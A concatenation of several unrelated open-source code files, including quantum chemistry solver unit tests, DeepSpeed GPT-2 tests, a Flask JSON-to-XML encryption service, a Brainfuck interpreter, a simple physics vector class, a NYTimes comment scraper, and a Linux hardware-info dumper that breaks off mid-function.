mol = gto.Mole()
mol.atom = H2
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = VQESolver()
solver.hardware_backend_type = QiskitParametricSolver
solver.ansatz_type = QiskitParametricSolver.Ansatze.UCCSD
solver.initial_var_params = [-0.01039529, -0.04685435, -0.01858744, -0.01118045, -0.04674074,
-0.01848484, -0.12702138, -0.0222594, 0.04799664, -0.02237422,
-0.04972733, 0.01266251, 0.04764409, 0.01265669, -0.06169727]
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.1478300615818977, delta=1e-3)
@unittest.skip("Pending faster implementation of get_rdm.")
def test_h4_sto3g(self):
""" Test the converged energy of VQE with initial variational parameters provided by the user """
mol = gto.Mole()
mol.atom = H4
mol.basis = "sto3g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = VQESolver()
solver.hardware_backend_type = QiskitParametricSolver
solver.ansatz_type = QiskitParametricSolver.Ansatze.UCCSD
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.97784, delta=1e-3)
if __name__ == "__main__":
unittest.main()
```
#### File: problem_decomposition/dmet/test_dmet_fragment.py
```python
import unittest
from pyscf import gto
from openqemist.problem_decomposition.dmet._helpers.dmet_fragment import dmet_fragment_constructor
class TestFragments(unittest.TestCase):
""" Generate the orbital list """
def test_orbital_list_construction(self):
# Initialize Molecule object with PySCF and input
mol = gto.Mole()
mol.atom = """
C 0.94764 -0.02227 0.05901
H 0.58322 0.35937 -0.89984
H 0.54862 0.61702 0.85300
H 0.54780 -1.03196 0.19694
C 2.46782 -0.03097 0.07887
H 2.83564 0.98716 -0.09384
H 2.83464 -0.65291 -0.74596
C 3.00694 -0.55965 1.40773
H 2.63295 -1.57673 1.57731
H 2.63329 0.06314 2.22967
C 4.53625 -0.56666 1.42449
H 4.91031 0.45032 1.25453
H 4.90978 -1.19011 0.60302
C 5.07544 -1.09527 2.75473
H 4.70164 -2.11240 2.92450
H 4.70170 -0.47206 3.57629
C 6.60476 -1.10212 2.77147
H 6.97868 -0.08532 2.60009
H 6.97839 -1.72629 1.95057
C 7.14410 -1.62861 4.10112
H 6.77776 -2.64712 4.27473
H 6.77598 -1.00636 4.92513
C 8.66428 -1.63508 4.12154
H 9.06449 -2.27473 3.32841
H 9.02896 -2.01514 5.08095
H 9.06273 -0.62500 3.98256"""
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
# Determine the number of atoms for each fragment
fragment_atom = [4,3,3,3,3,3,3,4]
# Test the construction of orbitals lists
orb_list, orb_list2, atom_list2 = dmet_fragment_constructor(mol, fragment_atom, 1)
        self.assertEqual(atom_list2, [7, 6, 6, 7], "The number of atoms per fragment does not agree")
self.assertEqual(orb_list, [28,26,26,28], "The orbital list (number per fragment) does not agree")
self.assertEqual(orb_list2, [[0,28],[28,54],[54,80],[80,108]], "The min max list does not agree")
if __name__ == "__main__":
unittest.main()
```
#### File: problem_decomposition/dmet/test_dmet_orbitals.py
```python
import unittest
from openqemist.problem_decomposition.dmet._helpers.dmet_orbitals import dmet_orbitals
from openqemist.problem_decomposition.electron_localization import iao_localization
from pyscf import gto, scf
import numpy as np
def get_file_path_stub():
""" Gets the path of the test files from anywhere in the test tree."
The direcory structure should be $SOMETHING/openqemist/openqemist/tests/$SOMETHINGELSE
so we trim after "tests", then add the path to the results files so we can
run the tests from anywhere in the tree."""
import os
cwd = os.getcwd()
tests_root = cwd[0:cwd.find("tests") + 5]
return tests_root + "/problem_decomposition/dmet/"
class TestDMETorbitals(unittest.TestCase):
""" Generate the localized orbitals employing IAOs """
def test_orbital_construction(self):
# Initialize Molecule object with PySCF and input
mol = gto.Mole()
mol.atom = """
C 0.94764 -0.02227 0.05901
H 0.58322 0.35937 -0.89984
H 0.54862 0.61702 0.85300
H 0.54780 -1.03196 0.19694
C 2.46782 -0.03097 0.07887
H 2.83564 0.98716 -0.09384
H 2.83464 -0.65291 -0.74596
C 3.00694 -0.55965 1.40773
H 2.63295 -1.57673 1.57731
H 2.63329 0.06314 2.22967
C 4.53625 -0.56666 1.42449
H 4.91031 0.45032 1.25453
H 4.90978 -1.19011 0.60302
C 5.07544 -1.09527 2.75473
H 4.70164 -2.11240 2.92450
H 4.70170 -0.47206 3.57629
C 6.60476 -1.10212 2.77147
H 6.97868 -0.08532 2.60009
H 6.97839 -1.72629 1.95057
C 7.14410 -1.62861 4.10112
H 6.77776 -2.64712 4.27473
H 6.77598 -1.00636 4.92513
C 8.66428 -1.63508 4.12154
H 9.06449 -2.27473 3.32841
H 9.02896 -2.01514 5.08095
H 9.06273 -0.62500 3.98256"""
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build(verbose=0)
mf = scf.RHF(mol)
mf.scf()
dmet_orbs = dmet_orbitals(mol, mf, range(mol.nao_nr()), iao_localization)
dmet_orbitals_ref = np.loadtxt(get_file_path_stub() + 'test_dmet_orbitals.txt')
# Test the construction of IAOs
for index, value_ref in np.ndenumerate(dmet_orbitals_ref):
self.assertAlmostEqual(value_ref, dmet_orbs.localized_mo[index], msg='DMET orbs error at index ' + str(index), delta=1e-6)
if __name__ == "__main__":
unittest.main()
```
#### File: quantum_solvers/microsoft_qsharp/test_microsoft_qsharp_parametric_solver.py
```python
import unittest
import numpy as np
from pyscf import gto, scf, mp
from openqemist.quantum_solvers import MicrosoftQSharpParametricSolver
def get_file_path_stub():
""" Gets the path of the test files from anywhere in the test tree."
The direcory structure should be $SOMETHING/QEMIST/qemist/tests/$SOMETHINGELSE
so we trim after "tests", then add the path to the results files so we can
run the tests from anywhere in the tree."""
import os
cwd = os.getcwd()
tests_root = cwd[0:cwd.find("tests") + 5]
return tests_root + "/quantum_solvers/microsoft_qsharp/data/"
def matricize_2rdm(two_rdm, n_electrons, n_orbitals):
""" Turns the two_rdm tensor into a matrix for test purposes """
l = 0
sq = n_orbitals*n_orbitals
    jpqrs = np.zeros((n_orbitals, n_orbitals), dtype=int)
for i in range(n_orbitals):
for j in range(n_orbitals):
jpqrs[i,j] = l
l += 1
rho = np.zeros((sq,sq))
for i in range(n_orbitals):
for j in range(n_orbitals):
ij = jpqrs[i,j]
for k in range(n_orbitals):
for l in range(n_orbitals):
kl = jpqrs[k,l]
rho[ij,kl] += two_rdm[i,k,j,l]
return rho
H2 = """
H 0.00 0.00 0.0
H 0.00 0.00 0.74137727
"""
H4 = """
H 0.7071067811865476 0.0 0.0
H 0.0 0.7071067811865476 0.0
H -1.0071067811865476 0.0 0.0
H 0.0 -1.0071067811865476 0.0
"""
LiH = """
H 0.00 0.00 0.0
Li 0.00 0.00 1.0
"""
# References for H2
amplitudes_H2 = [1.69971474e-05, 5.65855806e-02]
# References for H4
amplitudes_H4 = [-3.00520142e-05, -3.41547577e-05, 7.61837556e-06 ,-2.24075399e-05,
1.12512690e-02, 3.42703399e-01, 3.44523818e-02, 1.46586868e-02,
7.69034155e-02, 7.99964875e-03, -1.81430817e-01, -1.06611015e-01,
1.12938142e-02, -3.75164050e-02]
# References for LiH
amplitudes_LiH = [-4.17776465e-04, -3.01636877e-02, 2.59247846e-06, -1.81380838e-06,
2.56473288e-06, -1.67351123e-06, 4.99995120e-04, 4.87411549e-04,
1.67454873e-03, 1.12528808e-02, 8.90183149e-04, 1.82504586e-02,
8.40833525e-04, 1.82672779e-02, 3.93722603e-04, 4.83775296e-02,
4.99457737e-04, -1.34326076e-18, -3.13927118e-08, -7.69532977e-09,
-7.69532977e-09, 1.61799005e-03, -4.24862234e-03, -7.69532977e-09,
-3.13927118e-08, -1.07614392e-07, -3.13927118e-08, -1.49223410e-03,
-4.35798373e-02, 2.98149476e-03, -3.13927118e-08, -2.66454784e-08,
-7.69532977e-09, -7.69532977e-09, -5.64104758e-08, -7.69532977e-09,
-1.15815072e-08, -7.69532977e-09, 2.98287967e-03, -3.13927118e-08,
-3.13927118e-08, -3.13927118e-08, -1.07614392e-07, 2.94725869e-03]
class MicrosoftQSharpParametricSolverTest(unittest.TestCase):
def test_no_mf_H2(self):
""" Tests number of amplitudes as well as simulate and get_RDM methods """
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol)
# Test that the number of variational parameters is as expected
self.assertEqual(solver.amplitude_dimension, 2)
# Test "simulate"
energy = solver.simulate(amplitudes_H2)
self.assertAlmostEqual(energy, -1.13727, delta=1e-5)
# Compute RDM matrices
one_rdm, two_rdm = solver.get_rdm()
# Test traces of matrices
n_elec, n_orb = mol.nelectron, mol.nao_nr()
rho = matricize_2rdm(two_rdm, n_elec, n_orb)
self.assertAlmostEqual(np.trace(one_rdm), n_elec, msg='Trace of one_rdm does not match number of electrons', delta=1e-6)
self.assertAlmostEqual(np.trace(rho), n_elec*(n_elec-1), msg='Trace of two_rdm does not match n_elec * (n_elec-1)', delta=1e-6)
def test_no_mf_H4(self):
""" Tests number of amplitudes as well as simulate and get_RDM methods """
mol = gto.Mole()
mol.atom = H4
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
# Initialize mean field object with PySCF
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
twoint = mf._eri
oneint = mf.get_hcore()
fock = mf.get_fock()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol)
# Test that the number of variational parameters is as expected
self.assertEqual(solver.amplitude_dimension, 14)
# Test "simulate"
energy = solver.simulate(amplitudes_H4)
# Compute RDM matrices
one_rdm, two_rdm = solver.get_rdm()
# Test traces of matrices
n_elec, n_orb = mol.nelectron, mol.nao_nr()
rho = matricize_2rdm(two_rdm, n_elec, n_orb)
self.assertAlmostEqual(np.trace(one_rdm), n_elec, msg='Trace of one_rdm does not match number of electrons', delta=1e-6)
self.assertAlmostEqual(np.trace(rho), n_elec*(n_elec-1), msg='Trace of two_rdm does not match n_elec * (n_elec-1)', delta=1e-6)
def test_no_mf_LiH(self):
""" Tests get_RDM methods: assume energy is correct and reconstruct from RDM """
mol = gto.Mole()
mol.atom = LiH
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
# Initialize mean field object with PySCF
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
twoint = mf._eri
oneint = mf.get_hcore()
fock = mf.get_fock()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol)
# Test that the number of variational parameters is as expected
self.assertEqual(solver.amplitude_dimension, 44)
# Test "simulate"
energy = solver.simulate(amplitudes_LiH)
# Compute RDM matrices
one_rdm, two_rdm = solver.get_rdm()
# Test traces of matrices
n_elec, n_orb = mol.nelectron, mol.nao_nr()
rho = matricize_2rdm(two_rdm, n_elec, n_orb)
self.assertAlmostEqual(np.trace(one_rdm), n_elec, msg='Trace of one_rdm does not match number of electrons', delta=1e-6)
self.assertAlmostEqual(np.trace(rho), n_elec*(n_elec-1), msg='Trace of two_rdm does not match n_elec * (n_elec-1)', delta=1e-6)
def test_mf_H2(self):
"""Tests that all the values are set correctly in the constructor."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
mean_field = scf.RHF(mol)
mean_field.verbose = 0
mean_field.scf()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol, mean_field)
self.assertEqual(solver.amplitude_dimension, 2)
energy = solver.simulate(amplitudes_H2)
self.assertAlmostEqual(energy, -1.13727, delta=1e-5)
def test_simulate_dimension_throw(self):
"""Tests that all the values are set correctly in the constructor."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
mean_field = scf.RHF(mol)
mean_field.verbose = 0
mean_field.scf()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol, mean_field)
# solver.amplitude_dimension = 2, this should throw.
self.assertRaises(ValueError, solver.simulate, [0])
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "1r0npipe/python-json-xml-converter-encypted",
"score": 3
} |
#### File: python-json-xml-converter-encypted/cont_a/cont_a.py
```python
import os
import json
from json2xml import json2xml
from json2xml.utils import readfromstring
from cryptography.fernet import Fernet
import flask
from flask import request, jsonify
xml_content = dict()
xml_content_arr = []
count_files = 0
if __name__ == "__main__":
web_app = flask.Flask(__name__)
web_app.config['DEBUG'] = True
key = os.getenv('KEY_ENCRYPT')
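    # NOTE: the KEY_ENCRYPT value read above is immediately replaced by a freshly generated Fernet key, which is persisted to /shared/secret.key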
key = Fernet.generate_key()
with open("/shared/secret.key", "wb") as key_file:
key_file.write(key)
try:
# reading the content of file
json_files = open('json_list.txt', 'r')
fernet = Fernet(key)
for file_json in json_files.readlines():
if not file_json.startswith("#"):
try:
opened_json = open(file_json.strip())
json_out = str(json.load(opened_json)).replace('\'', '\"')
data = readfromstring(json_out)
xml_out = json2xml.Json2xml(data, wrapper="all", pretty=True, attr_type=False).to_xml()
xml_out_encode = xml_out.encode()
xml_encrypted = fernet.encrypt(xml_out_encode)
xml_content['id'] = str(count_files)
xml_content['file'] = str(xml_encrypted)
xml_content['filename'] = file_json.strip().replace('json','xml')
xml_content_arr.append(xml_content.copy())
count_files = count_files + 1
except:
print("File - " + file_json + " cannot be opened")
exit()
finally:
#xml_file.close()
opened_json.close()
except:
print("The list or JSON file cannot be opened or something goes worng, please check the file format/permissions")
exit()
finally:
json_files.close()
@web_app.route('/files', methods=['GET'])
def file_id():
json_output = xml_content_arr
return jsonify(json_output)
web_app.run(host='0.0.0.0')
``` |
{
"source": "1rahul1/DeepSpeed",
"score": 2
} |
#### File: model/Megatron_GPT2/run_func_test.py
```python
import unittest
import subprocess
import os
import time
import re
from .test_common import BaseTestCase
def grep_loss_from_file(file_name):
loss = 0.0
with open(file_name, 'r') as f:
lines = f.readlines()
line_filter = "validation loss at the end of training for test data | LM loss:"
match_number = re.compile('LM loss: ([-+]?[0-9]+\.?[0-9]*(?:[Ee][-+]?[0-9]+)?)')
for line in lines:
if line_filter in line:
loss = re.findall(match_number, line)
loss = float(loss[0])
if loss == 0.0:
print("no loss found in file ", file_name)
return loss
class GPT2FuncTestCase(BaseTestCase):
def __init__(self, methodName="DeepSpeed function test on GPT2 model"):
super(GPT2FuncTestCase, self).__init__(methodName)
def setUp(self):
self.save_dir = os.getcwd()
new_dir = os.path.dirname(__file__)
if new_dir:
os.chdir(new_dir)
def tearDown(self):
os.chdir(self.save_dir)
def test_mp1_gpu1_node1(self):
test_config = {
"mp": 1,
"gpus": 1,
"nodes": 1,
"bs": 4,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs4.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
def test_mp1_gpu2_node1(self):
test_config = {
"mp": 1,
"gpus": 2,
"nodes": 1,
"bs": 8,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs8.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
def test_mp2_gpu4_node1(self):
test_config = {
"mp": 2,
"gpus": 4,
"nodes": 1,
"bs": 8,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs8.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
succ = self.run_partition_activations_test(test_config, 0.01)
self.assertTrue(succ)
def test_mp4_gpu4_node1(self):
test_config = {
"mp": 4,
"gpus": 4,
"nodes": 1,
"bs": 8,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs8.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
succ = self.run_partition_activations_test(test_config, 0.01)
self.assertTrue(succ)
def test_optimizer_scheduler(self):
test_config = {
"mp": 1,
"gpus": 1,
"nodes": 1,
"bs": 4,
"steps": 20,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_scheduler.json",
}
succ = self.run_test(test_config, 0.01)
        # just ensure it does not crash.
self.assertTrue(True)
def run_partition_activations_test(self, test_config, r_tol):
print("\n")
print("{0}: starting......".format(self.id()))
prefix = "gpt2_partition_activation_"
# baseline run...
test_config["deepspeed"] = False
base_file = self.gen_output_name(test_config, prefix)
# skip baseline run if it exists.
if not self.has_loss_data(base_file):
print("{0}: baseline run.".format(self.id()))
self.run_gpt2_test(test_config, base_file)
else:
print("{0}: baseline exists.".format(self.id()))
# DeepSpeed run...
test_config["deepspeed"] = True
test_config["other_args"] = "--partition-activations"
print("{0}: DeepSpeed run.".format(self.id()))
test_file = self.gen_output_name(test_config, prefix)
self.run_gpt2_test(test_config, test_file)
return self.check_parity(base_file, test_file, r_tol)
def run_test(self, test_config, r_tol):
print("\n")
print("{0}: starting......".format(self.id()))
prefix = "gpt2_func"
# baseline run...
test_config["deepspeed"] = False
base_file = self.gen_output_name(test_config, prefix)
# skip baseline run if it exists.
if not self.has_loss_data(base_file):
print("{0}: baseline run.".format(self.id()))
self.run_gpt2_test(test_config, base_file)
else:
print("{0}: baseline exists.".format(self.id()))
# DeepSpeed run...
test_config["deepspeed"] = True
print("{0}: DeepSpeed run.".format(self.id()))
test_file = self.gen_output_name(test_config, prefix)
self.run_gpt2_test(test_config, test_file)
return self.check_parity(base_file, test_file, r_tol)
def has_loss_data(self, file_name):
has_loss = False
if os.path.exists(file_name):
loss = grep_loss_from_file(file_name)
if loss != 0.0:
has_loss = True
return has_loss
def check_parity(self, base_file, test_file, r_tol):
base_loss = grep_loss_from_file(base_file)
test_loss = grep_loss_from_file(test_file)
print("baseline loss: {0}, test loss: {1}".format(base_loss, test_loss))
if base_loss == 0.0 or test_loss == 0.0:
return False
if abs((base_loss - test_loss) / base_loss) > r_tol:
return False
return True
def suite():
suite = unittest.TestSuite()
suite.addTest(GPT2FuncTestCase('test_mp1_gpu1_node1'))
suite.addTest(GPT2FuncTestCase('test_mp1_gpu2_node1'))
suite.addTest(GPT2FuncTestCase('test_mp2_gpu4_node1'))
suite.addTest(GPT2FuncTestCase('test_mp4_gpu4_node1'))
suite.addTest(GPT2FuncTestCase('test_optimizer_scheduler'))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner(failfast=True)
runner.run(suite())
``` |
{
"source": "1ramen/bfython",
"score": 3
} |
#### File: bfython/src/bfython.py
```python
import core
from IO.args import argparser
def main():
"""Load and execute a brainf**k source file"""
# parse the command line arguments
args = argparser.parse_args()
# generate tokens from a file
tokens = core.parser.lex(args.file, args.comment)
# execute the code and generate a resulting tape
tape = core.parser.parse(tokens, args.length, args.size, args.wrapping, args.endofloop)
# dump the tape to a file
if args.dumpfile is not None:
core.parser.dump(args.dumpfile, tape)
if __name__ == "__main__":
main()
```
#### File: src/core/parser.py
```python
import core.environment
def lex(file: str, comment: str) -> list:
"""Parse source file"""
source = open(file)
tokens = []
for line in source:
for ch in line:
if ch == comment:
break
tokens += ch
return tokens
def parse(tokens: list, length: int, size: int, wrapping: bool, end_of_loop: int) -> core.environment.Tape:
env = core.environment.Environment(length, size, wrapping, end_of_loop)
env.parse(tokens)
return env.tape
def dump(file: str, tape: core.environment.Tape):
dump_file = open(file, 'w')
dump_file.write(str(tape))
``` |
{
"source": "1ramen/physiics",
"score": 4
} |
#### File: physiics/src/tools.py
```python
import math
from engineio import *
class Vector:
"""XY pair for calculating motion"""
def __init__(self, x=0, y=None):
if y is None:
y = x
self.x = int(x)
self.y = int(y)
def length(self):
"""Return vector length"""
# use pythagorean theorem to calculate the overall length
return math.sqrt(self.x ** 2 + self.y ** 2)
def zero(self):
"""Clear the Vector"""
# set the vector to a default value and return it
self = Vector()
return self
def __str__(self):
return "({}, {})".format(self.x, self.y)
def __add__(self, other):
return Vector(self.x + other.x, self.y + other.y)
def __sub__(self, other):
return Vector(self.x - other.x, self.y - other.y)
def __mul__(self, other):
try:
return Vector(self.x * other.x, self.y * other.y)
except:
return Vector(self.x * other, self.y * other)
def __truediv__(self, other):
return Vector(self.x / other.x, self.y / other.y)
def __floordiv__(self, other):
return Vector(self.x // other.x, self.y // other.y)
    def __iadd__(self, other):
        # in-place operators must return a value; otherwise `v += u` rebinds v to None
        return self + other
    def __isub__(self, other):
        return self - other
def __neg__(self):
return Vector(-self.x, -self.y)
def __invert__(self):
return Vector(self.y, self.x)
class Item:
"""Object in space"""
def __init__(self, velocity=Vector(), mass=0, symbol=' '):
self.velocity = velocity
self.mass = mass
self.symbol = symbol
self.moved = False
def __str__(self):
return "<{}, {}, '{}'>".format(self.velocity.__str__(), self.mass, self.symbol)
def momentum(self) -> int:
"""Calculate the momentum of the item"""
return self.velocity.length() * self.mass
def accelerate(self, acceleration: Vector) -> Vector:
"""Accelerate the object by a given ammount"""
# if there is no second term assume that the first applies to both
if acceleration.y is None:
acceleration.y = acceleration.x
# update the velocity ensuring that if it is decelerating, it doesn't go below zero
if self.velocity.x > 0:
self.velocity.x = max(self.velocity.x + acceleration.x, 0)
elif self.velocity.x < 0:
self.velocity.x = min(self.velocity.x - acceleration.x, 0)
if self.velocity.y > 0:
self.velocity.y = max(self.velocity.y + acceleration.y, 0)
elif self.velocity.y < 0:
self.velocity.y = min(self.velocity.y - acceleration.y, 0)
# return the updated velocity
return self.velocity
def gravity(self, gravity: int) -> None:
"""Apply given gravitaional constant to Item"""
if self.mass != 0:
self.velocity.y += gravity
def move(self, pos: Vector) -> Vector:
"""Calculate the new position of a point using the given Item's velocity"""
#print("{} + {} = {}".format(pos, self.velocity, pos + self.velocity))
return pos + self.velocity
``` |
{
"source": "1rara/BGMTagViewer",
"score": 3
} |
#### File: BGMTagViewer/py/subjectCrawler.py
```python
import scrapy
import json
import random
import sys
from scrapy.crawler import CrawlerProcess
class Spider(scrapy.Spider):
name='bgmSubjectSpider'
start_urls = []
years = []
data = {}
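    # scrapeIndex.json holds a list of dicts mapping subject id -> year; merge them into a single lookup table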
for i in json.load(open('./data/scrapeIndex.json')):
data.update(i)
print(len(data))
for i in data:
if data[i] and i != '':
start_urls.append(
'https://api.bgm.tv/v0/subjects/'+i)
else:
print('year not exist:', i)
#start_urls = random.sample(start_urls, 20)
def parse(self, response):
res = json.loads(response.text)
res['year'] = self.data[str(res['id'])]
res.pop('summary', None)
res.pop('images', None)
yield res
process = CrawlerProcess(settings={
'FEEDS': {
'./data/subject.json': {
'format': 'json',
'overwrite': True,
},
},
'FEED_EXPORT_ENCODING': 'utf-8',
'DEFAULT_REQUEST_HEADERS': {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
'Authorization': 'Bearer '+sys.argv[1],
},
'ROBOTSTXT_OBEY': False,
'LOG_FILE': 'log.txt',
'LOG_LEVEL': 'INFO',
})
process.crawl(Spider)
process.start()
``` |
{
"source": "1Reinier/CapstoneThesis",
"score": 2
} |
#### File: 1Reinier/CapstoneThesis/test.py
```python
from main import *
def main():
simulation = Controller()
simulation.test() # prints banks' asset size, to export for statistical analysis | PASSED
# for bank in simulation.banks:
# bank.test() # prints bank_id and degree | PASSED
pass
if __name__ == "__main__":
# test settings
main()
```
#### File: 1Reinier/CapstoneThesis/UI.py
```python
class Interface(object):
"""
Creates visual representation of the data.
"""
def __init___(self):
pass
def plot(self, xlist, ylist):
"""
Plots data from xlist and ylist.
"""
pass
#
#
#
# TO DO IN FUTURE RESEARCH
#
#
#
#
``` |
{
"source": "1Reinier/NYTimes-Comment-Popularity-Prediction",
"score": 3
} |
#### File: 1Reinier/NYTimes-Comment-Popularity-Prediction/scrape.py
```python
import requests, time, simplejson, sys
from datetime import date, datetime, timedelta
def perdelta(start, end, delta):
curr = start
while curr < end:
yield curr
curr += delta
# Scrape 300 comments per day from Nov. 1, 2014 to Oct. 31, 2015
for da in perdelta(date(2015, 2, 21), date(2015, 11, 1), timedelta(days=1)):
comments = []
print da
skip = False
gotany = True
for i in range(12): # collect 25*12=300 comments
if not skip:
success = False
count = 0
url = ('http://api.nytimes.com/svc/community/v3/user-content/' +
'by-date.json?api-key=KEY&date=' + str(da) +
'&offset=' + str(25*i))
while not success:
comments_data = requests.get(url)
try:
data = simplejson.loads(comments_data.content)
success = True # go to the next offset
for d in data['results']['comments']:
comments.append(d)
time.sleep(2)
except:
print 'error on {}'.format(str(da))
print url
count += 1
if count > 3:
success = True # not really
skip = True # just skip to the next day
if i == 0:
gotany = False # if we didn't get any comments from that day
time.sleep(2)
if gotany:
filestr = 'comments {}.json'.format(str(da))
with open(filestr, 'w') as f:
simplejson.dump(comments, f)
# Short script to combine all the JSON lists into one
allcomments = []
for d in perdelta(date(2014, 1, 1), date(2015, 12, 31), timedelta(days=1)):
try:
with open('comments {}.json'.format(str(d))) as f:
c = simplejson.load(f)
allcomments.extend(c)
except:
pass
``` |
{
"source": "1Revenger1/OCSysInfo",
"score": 3
} |
#### File: dumps/Linux/linux.py
```python
import os
import re
from error.cpu_err import cpu_err
from managers.devicemanager import DeviceManager
class LinuxHardwareManager:
"""
Instance, implementing `DeviceManager`, for extracting system information
from Linux using the `sysfs` pseudo file system.
https://www.kernel.org/doc/html/latest/admin-guide/sysfs-rules.html
"""
def __init__(self, parent: DeviceManager):
self.info = parent.info
self.pci = parent.pci
self.intel = parent.intel
def dump(self):
self.cpu_info()
self.mobo_info()
self.gpu_info()
self.net_info()
self.audio_info()
self.input_info()
def cpu_info(self):
try:
cpus = open('/proc/cpuinfo', 'r').read()
except Exception as e:
cpu_err(e)
cpu = cpus.split('\n\n')
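        # /proc/cpuinfo contains one block per logical processor, separated by blank lines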
if not cpu:
return
cpu = cpu[0] # Get only the first CPU identifier.
model = re.search(r'(?<=model name\t\: ).+(?=\n)', cpu)
flagers = re.search(r'(?<=flags\t\t\: ).+(?=\n)', cpu)
cores = re.search(r'(?<=cpu cores\t\: ).+(?=\n)', cpu)
# Count the amount of times 'processor'
# is matched, since threads are enumerated
# individually.
data = {}
if model:
data = {
model.group(0): {}
}
else:
return
if flagers:
flagers = flagers.group(0)
# List of supported SSE instructions.
data[model.group(0)]['SSE'] = list(sorted([flag.replace('_', '.') for flag in flagers.split(' ') if 'sse' in flag.lower(
) and not 'ssse' in flag.lower()], reverse=True))[0].upper()
data[model.group(
0)]['SSSE3'] = 'Supported' if 'ssse3' in flagers else 'Not Available'
if cores:
data[model.group(0)]['Cores'] = cores.group(0)
try:
data[model.group(0)]['Threads'] = open(
'/proc/cpuinfo', 'r').read().count('processor')
except:
pass
self.info.get('CPU').append(data)
def gpu_info(self):
for file in os.listdir('/sys/class/drm/'):
# DRM devices (not FBDev) are enumerated with the format `cardX`
# inside of sysfs's DRM directory. So we look for those, and traverse
# them. We look for the `device` and `vendor` file, which should always be there.
if 'card' in file and not '-' in file:
path = f'/sys/class/drm/{file}'
try:
ven = open(f'{path}/device/vendor', 'r').read().strip()
dev = open(f'{path}/device/device', 'r').read().strip()
model = self.pci.get_item(dev[2:], ven[2:]).get('device')
except Exception as e:
continue
igpu = self.intel.get(dev.upper()[2:], {})
if igpu:
CPU = self.info['CPU'][0][list(
self.info['CPU'][0].keys())[0]]
self.info['CPU'][0] = {
list(self.info['CPU'][0].keys())[0]: CPU | {
'Codename': igpu.get('codename')
}
}
self.info.get('GPU').append({
model: {
'Device ID': dev,
'Vendor': ven
}
})
def net_info(self):
for file in os.listdir('/sys/class/net'):
path = f'/sys/class/net/{file}/device'
# We ensure that the enumerated directory in the sysfs net
# directory is a valid card, since it'll contain a `vendor` and
# `device` file.
if os.path.isfile('{}/device'.format(path)):
try:
ven = open(f'{path}/vendor', 'r').read().strip()
dev = open(f'{path}/device', 'r').read().strip()
model = self.pci.get_item(dev[2:], ven[2:]).get('device')
except:
return
else:
self.info.get('Network').append({
model: {
'Device ID': dev,
'Vendor': ven
}
})
def audio_info(self):
for file in os.listdir('/sys/class/sound'):
# Sound devices are enumerated similarly to DRM devices,
# with the format `cardX`, so we look for those, and look
# for `vendor` and `device` files.
if 'card' in file.lower() and not '-' in file.lower():
path = f'/sys/class/sound/{file}/device'
try:
ven = open(f'{path}/vendor', 'r').read().strip()
dev = open(f'{path}/device', 'r').read().strip()
model = self.pci.get_item(dev[2:], ven[2:]).get('device')
except:
continue
else:
self.info.get('Audio').append({
model: {
'Device ID': dev,
'Vendor': ven
}
})
def mobo_info(self):
# Details about the motherboard is
# located in /sys/devices/virtual/dmi/id
#
# So we simply look for `board_name` and
# `board_vendor` to extract its model name,
# and its vendor's name.
try:
path = '/sys/devices/virtual/dmi/id'
model = open(f'{path}/board_name', 'r').read().strip()
vendor = open(f'{path}/board_vendor', 'r').read().strip()
except:
return
if model:
data = {
'Model': model
}
if vendor:
data['Vendor'] = vendor
self.info['Motherboard'] = data
def input_info(self):
# This is the simplest way of reliably
# obtaining the path of the input devices
# located in sysfs. Ironically, by looking
# into procfs.
#
# Out of the things we look for,
# it contains the device name, and its sysfs path.
try:
devices = open('/proc/bus/input/devices', 'r').read().strip()
sysfs = []
except:
return
for device in devices.split('\n\n'):
if not any((x in device.lower() for x in ('touchpad', 'trackpad', 'synaptics', 'usb'))):
continue
for line in device.split('\n'):
if 'sysfs' in line.lower():
sysfs.append('/sys{}'.format(line.split('=')[1]))
for path in sysfs:
if os.path.isfile('{}/id/vendor'.format(path)):
try:
dev = '0x' + open(f'{path}/id/product', 'r').read().strip()
